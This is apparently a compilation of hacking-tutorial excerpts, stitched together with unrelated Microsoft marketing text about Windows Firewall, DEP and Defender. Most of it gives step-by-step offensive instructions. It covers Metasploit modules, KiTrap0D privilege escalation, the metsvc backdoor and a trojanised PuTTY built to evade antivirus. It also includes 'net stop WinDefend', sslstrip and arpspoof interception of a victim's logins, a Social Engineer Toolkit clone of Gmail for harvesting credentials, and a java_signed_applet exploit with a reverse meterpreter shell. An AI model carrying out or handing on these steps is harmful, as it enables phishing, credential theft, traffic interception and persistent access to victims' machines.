This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.
msf > use post/windows/gather/enum_muicache msf post(enum_muicache) > sessions ...sessions... msf post(enum_muicache) > set SESSION <session-id> msf post(enum_muicache) > show options ...show and set options... msf post(enum_muicache) > run
This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
win32k.sys is kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."
Vulnerable system : windows XP SP3,windows 2003 SP2,Windows 7 SP1,Windows 2008 32bit and Windows 2008 R2 SP1 64bit
Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.
For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.
Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.
DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.
When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action. Command : net stop WinDefend
Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.
After going through all the hard work of exploiting a system, it's often a good idea to leave yourself an easier way back into the system later. This way, if the service you exploited is down or patched, you can still gain access to the system. This is where Alexander Sotirov's 'metsvc' comes in handy and was recently added to the Metasploit trunk. To read about the original implementation of metsvc, go to http://www.phreedom.org/software/metsvc/
Using this backdoor, you can gain a Meterpreter shell at any point.
One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.
How to bypass internet security using msfpayload and mafencode
I have posted so many articles on windows hacking using metasploit,using trojan etc,
Today i m go no show u hack windows using putty.
1st u must encode putty for bypass antivirus using metasploit and than set payload in putty for connection to victim machine.
Now you send this encode putty file send to victim when victim open this tool than payload set connection between attacker machine to victim machine and encode is use for bypass antivirus so antivirus is not detect virus in putty.
You got meterpreter shell in your machine in metasploit so you do anythings in u r victim machine using meterpreter shell
You install trojan(netcat),u sniffing password (firefox,windows logon etc),u add new user account etc.
You might be interested in some of our other articles:
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
in my case iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777
this command is use for all traffic on 80 port is redirect to port number 7777
step 3 : now time to run sslstrip
path - /pentest/web/sslstrip
./sslstrip.py -l <listenPort> -w <txt file name >
in my case
sslstrip.py -l 7777 -w mitm
-w command - write all date in one txt file
step 4 : Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network
Run arpspoof to convince a network they should send their traffic to you
arpspoof -i <interface> -t <targetIP> <gatewayIP>
in my case arpspoof -i eth1 -t 192.168.1.102 192.168.1.1
IN VICTIM machine
IF u r blind successfull command than u r victim pc ip table is changed by arpspoof
so u r sniff victim's data.
when victim access his/her gmail account
so his/her open gmail site but this gmail site is not real but it is look like real site . one one difference - real gamil site is HTTPS but this is HTTP .
When ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.
SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.
Social Engineer Toolkit (SET)-Credential Harvester Attack
step 1 : 1st open terminal and go to this following path
cd /pentext/exploit/set
and than enter
and type ./set for open Social Engineer Toolkit
IT's look like
step 2 : Select option 1 : Social-Engineering Attacks from the set toolkit menu
now in set toolkit the new menu is open
step 3 : Select option 2 : Website Attack Vectors
The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.
now in set toolkit the new menu is open
step 5 : Select option 2 : Site cloner
now in set toolkit the new menu is open
step 6 : Now u enter ur target URL which u want clone ex. https://gmail.com
than enter.
Now Credential Harvester is runing on port 80 A attacker PC is ready for attack .
now an URL you should give to your victim http://<u r ip address>/
in my case
http://192.168.1.103/
IN VICTIM PC
When u r victim enter this url http://192.168.1.103/ . web browser open gmail website but this is fake site made by SET toolkit..
When ur victim enter his/her gmail Credential in this fake website , than fake website send Credential to attacker PC..
You got ur victim gmail Credential..:D
- - - - - VIDEO TUTORIAL - - - - -
If u want to learn How to use Credential Harvester Attack over the internet than click here(Youtube Video with HD print) If you have any questions, Feel free to ask. :D
1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can't find it, try to update your Metasploit Framework to newer version with msfupdate command. If the exploit was available, let's continue with picture below.
use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine
2.we need to add some required switches to make an attack successful.but if you want to view available switches, you can type show options.
set srvhost 192.168.1.103 ---> host that served the exploit set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering via website set uripath / ---> the URL format to send to victim (http://192.168.1.103) set lhost 192.168.1.103 ---> connect back address when successfully perform attack set lport 443 ---> port used to connect back to our machine set LHOST 192.168.1.103 ----> host that served the exploit for payload
3.exploit
now an URL you should give to your victim http://192.168.1.103/
4.When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.
5. After victim open the malicious URL and click RUN
Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.
